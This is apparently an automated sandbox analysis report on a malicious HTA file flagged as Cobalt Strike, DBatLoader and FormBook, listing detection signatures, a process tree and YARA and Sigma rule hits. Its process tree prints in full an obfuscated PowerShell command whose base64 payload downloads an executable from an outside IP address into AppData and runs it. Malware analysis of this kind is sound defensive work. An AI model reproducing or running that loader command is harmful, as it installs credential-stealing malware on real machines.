Windows
Analysis Report
fgd.hta
Overview
General Information
Detection | Score | Range | Confidence |
---|---|---|---|
Cobalt Strike, DBatLoader, FormBook | 100 | 0 - 100 | 100% |
Signatures
Detected Cobalt Strike Beacon
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected FormBook
Yara detected Powershell decode and execute
Allocates many large memory junks
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Drops PE files with benign system names
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Parents
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- mshta.exe (PID: 3372, cmdline: mshta.exe "C:\Users\user\Desktop\fgd.hta", MD5: 06B02D5C097C7DB1F109749C45F3F505)
- cmd.exe (PID: 4480, cmdline: "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))", MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5708, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 2424, cmdline: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex( $(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- csc.exe (PID: 7232, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
- cvtres.exe (PID: 7248, cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F1A.tmp" "c:\Users\user\AppData\Local\Temp\z0uhqkog\CSCA33479D5CCDF488DBD48FF689C9305B.TMP", MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- csrss.exe (PID: 7676, cmdline: "C:\Users\user\AppData\Roaming\csrss.exe", MD5: 848EBACD95EAD54CDCFE5D916093D2C8)
- cmd.exe (PID: 7728, cmdline: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7740, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7776, cmdline: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\37991.cmd, MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7784, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 7848, cmdline: ping 127.0.0.1 -n 10, MD5: B3624DD758CCECF93A1226CEF252CA12)
- iaoqralA.pif (PID: 7840, cmdline: C:\\Users\\user\\Links\iaoqralA.pif, MD5: C116D3604CEAFE7057D77FF27552C215)
- 4nHrKBXqqqVJFZFp.exe (PID: 5660, cmdline: "C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\wgDVT7rL.exe", MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
- systeminfo.exe (PID: 8116, cmdline: "C:\Windows\SysWOW64\systeminfo.exe", MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
- 4nHrKBXqqqVJFZFp.exe (PID: 2620, cmdline: "C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\7rPkWXE1JEx.exe", MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
- firefox.exe (PID: 7240, cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe", MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
- svchost.exe (PID: 6920, cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
DBatLoader | This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. | No Attribution | | |
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. | | | |
No configs have been found.
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security | | |
JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security | | |
JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security | | |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | | |
System Summary |
---|
Source: | Author: frack113, Nasreddine Bencherchali |
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) |
Source: | Author: Michael Haag |